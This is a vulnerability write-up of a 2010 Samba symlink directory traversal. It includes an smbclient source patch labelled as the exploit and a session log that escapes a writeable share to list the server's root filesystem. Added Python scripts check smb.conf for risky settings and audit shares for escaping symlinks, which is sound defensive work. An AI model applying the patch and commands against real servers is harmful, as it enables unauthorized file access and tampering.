Samba Remote Directory Traversal
logic fuckup discovered & exploited by Kingcope in 2010
A quite similar bug appears to have been found back in 2004:
http://marc.info/?l=bugtraq&m=109658688505723&w=2
A remote attacker can read, list and retrieve nearly all files on the system remotely.
Required is a valid Samba account for a share which is writeable, OR
a writeable share which is configured as a guest account share;
in the latter case this is a pre-authentication exploit.
The attacker can also write, for example into /tmp or anywhere the account
he is connecting with has write access (/home/<user> etc.).
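The preconditions above are a writeable share (guest or authenticated) on a server that lets a client create a UNIX symlink and then follows that link outside the share tree. The Python script below is an added example, not part of Kingcope's write-up: it parses a constructed smb.conf (modelled on the share listing further down, not the target's real configuration) and reports every writeable share on which those preconditions hold. The server-side knobs it checks are the real smb.conf parameters `unix extensions`, `wide links` and `follow symlinks`; `wide links = no` is the setting that stops smbd following a symlink out of the share, and later Samba releases default it to no. The `wide_links_default=True` argument mirrors the default of the affected releases; pass `False` to evaluate a current server.

```python
import configparser

# Constructed sample smb.conf, modelled on the share listing in the
# write-up (testmount, print$); it is not the target's real configuration.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba, Ubuntu)
   ; 'unix extensions', 'wide links' and 'follow symlinks' left at defaults

[testmount]
   path = /srv/testmount
   read only = no
   guest ok = yes

[print$]
   comment = Printer Drivers
   path = /var/lib/samba/printers
   read only = yes

[homes]
   comment = Home Directories
   browseable = no
   writable = yes
"""

# Same configuration with the mitigation applied globally.
HARDENED_SMB_CONF = SAMPLE_SMB_CONF.replace(
    "[global]", "[global]\n   wide links = no", 1)

TRUE_WORDS = {"yes", "true", "1", "on"}


def parse_smb_conf(text):
    """Return {section: {key: value}} for an smb.conf body (keys lower-cased)."""
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   delimiters=("=",))
    cp.read_string(text)
    return {s: {k.strip(): v.strip() for k, v in cp.items(s)}
            for s in cp.sections()}


def _truthy(sections, keys, default):
    """Look keys up in the given sections in order (share first, then
    [global]); return the default when none of them sets the parameter."""
    for sec in sections:
        for k in keys:
            if k in sec:
                return sec[k].lower() in TRUE_WORDS
    return default


def share_is_writeable(share, glob):
    # Samba treats 'writeable', 'writable' and 'write ok' as one parameter
    # and 'read only' as its inverse; the default is read only = yes.
    for sec in (share, glob):
        for k in ("writeable", "writable", "write ok"):
            if k in sec:
                return sec[k].lower() in TRUE_WORDS
        if "read only" in sec:
            return sec["read only"].lower() not in TRUE_WORDS
    return False


def risky_shares(text, wide_links_default=True):
    """Writeable shares on a server whose configuration still lets a client
    create a symlink (unix extensions) and follow it out of the share
    (wide links + follow symlinks).  wide_links_default=True reflects the
    default of the affected Samba releases."""
    conf = parse_smb_conf(text)
    glob = conf.get("global", {})
    unix_ext = _truthy([glob], ["unix extensions"], True)
    findings = []
    for name, share in conf.items():
        if name == "global" or not share_is_writeable(share, glob):
            continue
        wide = _truthy([share, glob], ["wide links"], wide_links_default)
        follow = _truthy([share, glob], ["follow symlinks"], True)
        if not (unix_ext and wide and follow):
            continue  # link cannot be created, or cannot leave the share
        guest = _truthy([share, glob], ["guest ok", "public"], False)
        findings.append({
            "share": name,
            "path": share.get("path", "<unset>"),
            "access": "unauthenticated (guest)" if guest else "authenticated",
        })
    return findings


if __name__ == "__main__":
    for label, conf in (("default", SAMPLE_SMB_CONF),
                        ("hardened", HARDENED_SMB_CONF)):
        print(label, risky_shares(conf))
```

On the sample configuration the script flags testmount (guest, so reachable before authentication) and homes (authenticated users only) and leaves print$ alone; with `wide links = no` added to [global] it reports nothing.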
Exploit session (using the patched smbclient exploit; smb is a Samba user that was created beforehand):
root@nr-pentest:~/Downloads/samba-3.4.5/source3# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -Usmb //<host>/testmount/
Enter smb's password:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]
smb: \> ls
. D 0 Wed Feb 3 14:27:03 2010
.. D 0 Wed Feb 3 14:19:13 2010
test D 0 Wed Feb 3 14:19:13 2010
xxx A 1955 Wed Feb 3 14:22:42 2010
45503 blocks of size 2097152. 24437 blocks available
smb: \> symlink ../../../../../ foobar
smb: \> ls
. D 0 Wed Feb 3 14:27:47 2010
.. D 0 Wed Feb 3 14:19:13 2010
xxx A 1955 Wed Feb 3 14:22:42 2010
foobar D 0 Mon Feb 1 20:29:12 2010
45503 blocks of size 2097152. 24437 blocks available
smb: \> ls ..
NT_STATUS_OBJECT_PATH_SYNTAX_BAD listing \..
45503 blocks of size 2097152. 24437 blocks available
smb: \> cd foobar
smb: \foobar\> ls
. D 0 Mon Feb 1 20:29:12 2010
.. D 0 Mon Feb 1 20:29:12 2010
initrd.img.old 7646184 Mon Jan 18 13:15:48 2010
boot.ini 18832 Mon Feb 1 20:29:12 2010
home D 0 Mon Jan 18 13:08:24 2010
initrd.img 8007195 Thu Jan 21 21:51:26 2010
.cache DH 0 Sat Jan 23 14:19:08 2010
opt D 0 Sat Jan 30 11:39:59 2010
lib D 0 Thu Jan 21 21:13:01 2010
usr D 0 Sun Jan 31 22:08:11 2010
.libs DH 0 Thu Jan 21 12:30:48 2010
var D 0 Sun Jan 31 21:14:42 2010
bin D 0 Mon Jan 18 13:31:14 2010
selinux D 0 Tue Oct 20 01:05:22 2009
root D 0 Tue Feb 2 19:43:59 2010
vmlinuz.old 3890400 Fri Oct 16 20:03:49 2009
vmlinuz 3890560 Thu Dec 10 20:33:26 2009
etc D 0 Wed Feb 3 14:17:29 2010
srv D 0 Sat Jan 23 20:17:29 2010
proc DR 0 Wed Feb 3 14:10:41 2010
dev D 0 Wed Feb 3 14:11:02 2010
boot D 0 Thu Jan 21 21:51:26 2010
mnt D 0 Sat Jan 23 19:26:23 2010
media D 0 Fri Jan 29 08:32:31 2010
cdrom D 0 Mon Jan 18 12:40:11 2010
tmp D 0 Wed Feb 3 14:26:20 2010
sbin D 0 Thu Jan 21 21:50:58 2010
lost+found D 0 Mon Jan 18 12:39:57 2010
sys D 0 Wed Feb 3 14:10:41 2010
45503 blocks of size 2097152. 24437 blocks available
smb: \foobar\>
put and get work in the folder now!
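The session above creates the link foobar pointing at ../../../../../ and then lists the server's root directory through it. The audit script below is an added example and not part of Kingcope's write-up: it rebuilds that share layout in a temporary directory (names and file contents are constructed) and reports every symlink below a share root whose resolved target lies outside the share, which is the artefact an administrator can look for on a server that had to keep `wide links` enabled.

```python
import os
import shutil
import tempfile


def escaping_symlinks(share_root):
    """Return (link, raw target, resolved target) for every symlink below
    share_root whose resolved target is not inside the share."""
    root = os.path.realpath(share_root)
    findings = []
    # followlinks is False by default, so the walk never descends into a link
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            if not os.path.islink(full):
                continue
            resolved = os.path.realpath(full)
            # a target inside the share shares the root as common prefix
            if os.path.commonpath([root, resolved]) != root:
                findings.append((os.path.relpath(full, root),
                                 os.readlink(full), resolved))
    return findings


def build_demo_share():
    """Constructed layout mirroring the write-up's listing of testmount
    after the exploit: a 'test' directory, a file 'xxx', the link 'foobar'
    and one harmless link that stays inside the share."""
    base = tempfile.mkdtemp(prefix="smb-audit-")
    share = os.path.join(base, "srv", "testmount")
    os.makedirs(os.path.join(share, "test"))
    with open(os.path.join(share, "xxx"), "w") as fh:
        fh.write("constructed sample file\n")
    os.symlink("../../../../../", os.path.join(share, "foobar"))
    os.symlink("test", os.path.join(share, "inside"))
    return share


def audit_demo():
    """Build the demo share, audit it and clean up (rmtree unlinks symlinks
    instead of following them, so the escaping link is removed safely)."""
    share = build_demo_share()
    try:
        return escaping_symlinks(share)
    finally:
        shutil.rmtree(os.path.dirname(os.path.dirname(share)))


if __name__ == "__main__":
    for link, target, resolved in audit_demo():
        print(f"{link} -> {target} (resolves to {resolved})")
```

Only foobar is reported; the link named inside resolves to the share's own test directory and is ignored.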
Listing the available shares; this is normal operation mode, not part of the exploit:
root@nr-pentest:~/Downloads/samba-3.4.5/source3/client# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -L //<host>/
Enter root's password:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]
Sharename Type Comment
--------- ---- -------
testmount Disk // < this share is writable and exploitable!!
print$ Disk Printer Drivers
IPC$ IPC IPC Service (nr-pentest server (Samba, Ubuntu))
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]
Server Comment
--------- -------
NR-PENTEST nr-pentest server (Samba, Ubuntu)
Workgroup Master
--------- -------
WORKGROUP NR-PENTEST
smbclient patch (exploit):
samba-3.4.5/source3/client/client.c
/****************************************************************************
 UNIX symlink.
****************************************************************************/

static int cmd_symlink(void)
{
        TALLOC_CTX *ctx = talloc_tos();
        char *oldname = NULL;
        char *newname = NULL;
        char *buf = NULL;
        char *buf2 = NULL;
        char *targetname = NULL;
        struct cli_state *targetcli;

        if (!next_token_talloc(ctx, &cmd_ptr,&buf,NULL) ||
            !next_token_talloc(ctx, &cmd_ptr,&buf2,NULL)) {
                d_printf("symlink <oldname> <newname>\n");
                return 1;
        }

        oldname = talloc_asprintf(ctx,
                        "%s", // << HERE modified
                        buf);
        if (!oldname) {
                return 1;
        }
        newname = talloc_asprintf(ctx,
                        "%s", // << HERE modified
                        buf2);
        if (!newname) {
                return 1;
        }

        /* ORIGINAL SMBCLIENT SOURCE LINES TO BE MODIFIED (SEE ABOVE).
        oldname = talloc_asprintf(ctx,
                        "%s%s", // < modified (see above)
                        client_get_cur_dir(), // < removed (see above)
                        buf);
        if (!oldname) {
                return 1;
        }
        newname = talloc_asprintf(ctx,
                        "%s%s", // < modified (see above)
                        client_get_cur_dir(), // < removed (see above)
                        buf2);
        if (!newname) {
                return 1;
        }
        ----------------------------------------------*/

        if (!cli_resolve_path(ctx, "", auth_info, cli, oldname, &targetcli, &targetname)) {
                d_printf("link %s: %s\n", oldname, cli_errstr(cli));
                return 1;
        }

        if (!SERVER_HAS_UNIX_CIFS(targetcli)) {
                d_printf("Server doesn't support UNIX CIFS calls.\n");
                return 1;
        }

        if (!cli_unix_symlink(targetcli, targetname, newname)) {
                d_printf("%s symlinking files (%s -> %s)\n",
                        cli_errstr(targetcli), newname, targetname);
                return 1;
        }

        return 0;
}
// Cheers,
// kcope